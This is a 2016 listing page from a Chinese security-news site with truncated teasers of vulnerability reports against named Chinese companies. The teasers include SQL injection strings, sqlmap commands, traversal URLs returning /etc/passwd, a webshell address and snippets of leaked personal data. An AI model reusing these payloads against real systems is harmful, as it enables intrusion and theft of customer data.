欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!
  • 神州数码某站发现shell泄漏大量客户信息订单电话等
  • 发现shellhttp://106.39.111.48:7001/ca/ma3.jsp后续说明怎么断定是神州数码的 登上去找到了数据库5000万数据! 数据库里可以看到是神州数码的 1000多万客户订单签收,泄漏客户详细住址电话姓名等 就不继......
  • 所属分类:漏洞公告 更新时间:2016-07-09 相关标签: 阅读全文...
  • 某银行主站伪静态sql布尔盲注root
  • http://**.**.**.**//cmsDeskArticle/bankCardType/1 注入点 经测试 information_schema不能用,sqlmap神器也悲伤 肯花时间的话 可以猜的出表 工具跑不了 1' or length(database())=7 and 1=1 or '1'='1' or as......
  • 所属分类:漏洞公告 更新时间:2016-07-08 相关标签: 阅读全文...
  • 263通信某APP一处SQL盲注(附验证脚本)
  • 263网络会议 3.0http://www.263.net/263/download/ 下载APP,"快速入会"功能,接口: POST http://cc.263.net/rest/netmeeting/quickLoginNet HTTP/1.1 Content-Type: application/json;charset=UTF-8 Content......
  • 所属分类:漏洞公告 更新时间:2016-07-08 相关标签: 阅读全文...
  • 航空行业安全之春秋航空某站点SQL注入
  • 航空行业安全之春秋航空某站点SQL注入 $ python sqlmap.py -u "http://mall.ch.com/product/search?name=%E5%A4%A9%E5%B0%A7%E6%95%B0%E7%A0%81" --level 3 --risk='3' --dbms='oracle' --banner --dbs --users ......
  • 所属分类:漏洞公告 更新时间:2016-07-08 相关标签: 阅读全文...
  • 赶集网主站SQL注入
  • 友情检测赶集网,发现SQL注入一枚 注入点位于:POST /sms/post/send.php?ad-ref=sms&content=&unique_id=house_premier_puid_2105604786&domain=bj提交以下post内容可现:POST /sms/post/send.php?ad-r......
  • 所属分类:漏洞公告 更新时间:2016-07-07 相关标签: 阅读全文...
  • 国都证券某处SQL注入漏洞
  • 国都证券某处SQL注入漏洞 问题出在http://im.guodu.com:9090中,首先是弱口令进入系统,http://111.205.160.129:9090/reportadmin admin发现注入点,发包如下: POST /report/Service/kpi/pageCustomerCount HTTP/......
  • 所属分类:漏洞公告 更新时间:2016-07-06 相关标签: 阅读全文...
  • M1905电影网某重要站点SQL注入
  • M1905电影网某重要站点SQL注入 想知道挖洞的最重要的秘诀是什么吗?是神乎其技的技术,还是扫描全网的神器,亦或是猥琐独到的思路,拼的是持之以恒的耐心,还是充沛旺盛的精力。 我告诉你以上都不是,最重要的是瞎......
  • 所属分类:漏洞公告 更新时间:2016-07-04 相关标签: 阅读全文...
  • ChinaCache某CDN节点getshell危及内网安全
  • Smart Geek 某主机zabbix版本太老,存在zabbix前台注入 58.220.27.205/zabbix/ 58.220.27.200/zabbix/ 利用注入获取cookie id: http://58.220.27.205/zabbix/httpmon.php?applications=2%20and%20%28select%20......
  • 所属分类:漏洞公告 更新时间:2016-07-04 相关标签: 阅读全文...
  • 蚂蜂窝主站任意文件读取
  • http://www.mafengwo.cn/sales/union.php?step=preView&pdf=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/v......
  • 所属分类:漏洞公告 更新时间:2016-07-04 相关标签: 阅读全文...
  • wiz笔记泄漏信息之阿里巴巴高级工程师社工案例
  • 撞库为知笔记,翻到一位阿里巴巴程序员帐号登陆,首先顶置到是个人简历,以下一些图片关键点还请审核大大看完打个码 下载简历,看了看 泄漏了帐号主人的许多个人详细信息和项目经历 *陈�* *1021992* ......
  • 所属分类:漏洞公告 更新时间:2016-07-04 相关标签: 阅读全文...
  • 贵州省机场集团有限公司邮件系统内部敏感信息泄露
  • 贵州省机场集团有限公司成立于2003年12月30日,是省属大一型国有企业。但作为国有企业,贵州省机场集团有限公司并没有把公司中信息防护做到位。贵州省机场集团有限公司的系统邮箱通过漏洞可以获取用户名,之后通过暴......
  • 所属分类:漏洞公告 更新时间:2016-07-03 相关标签: 阅读全文...
  • 好贷网核心功能源码泄露
  • 1漏洞位置 http://sandbox.api.haodai.com/.git/config 2用githack可以下载源码 看了下,是好贷网APP后台api代码,TP框架搭建而成,查看Model和Action 涉及到用户管理,理财产品等核心功能贴几个敏感文件 ......
  • 所属分类:漏洞公告 更新时间:2016-07-03 相关标签: 阅读全文...
  • 搜狗主站存在SSRF漏洞(绕过ip限制)
  • 有简单的过滤,比如会检测IP地址是否为内网IP。如:http://www.sogou.com/reventondc/transform?charset=GBK&key=%E8%B0%A2%E6%96%87%E4%B8%9C1&objid=2000000&type=2&userarea=sss&vrid=700438......
  • 所属分类:漏洞公告 更新时间:2016-07-02 相关标签: 阅读全文...
  • 搜狗某站任意文件读取
  • view-source:http://athena.brand.sogou.com/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/issueRed Hat Enterprise Linux Server release 5.5 (Tikanga)Kernel \r ......
  • 所属分类:漏洞公告 更新时间:2016-07-02 相关标签: 阅读全文...
  • SoEasy网站群管理系统全版本通用命令执行(可getshell)
  • 易极天成公司提供智慧政务、智慧教育和智慧企业领域的解决方案,打造和推广成熟软件产品,构建面向全国的营销与服务网络,并在上述领域拥有1000余成功案例。 公司视“客户满意”为最核心的企业文化,竭尽所能提供给顾......
  • 所属分类:漏洞公告 更新时间:2016-07-01 相关标签: 阅读全文...
  • 网易某站点MySQL注射(附python脚本)
  • 网易某站点MySQL注入(附python脚本) http://m.zibo.house.163.com/jingmeil" and mid(lower(user()),1,1)="m" and "1"="1/p/1 path中的第一个参数可以注射。MySQL bool blind. 猜解user() mzibohouse1......
  • 所属分类:漏洞公告 更新时间:2016-07-01 相关标签: 阅读全文...
  • 本类最新更新
    • 本类热门文章
      • 最新下载
        • 标签云集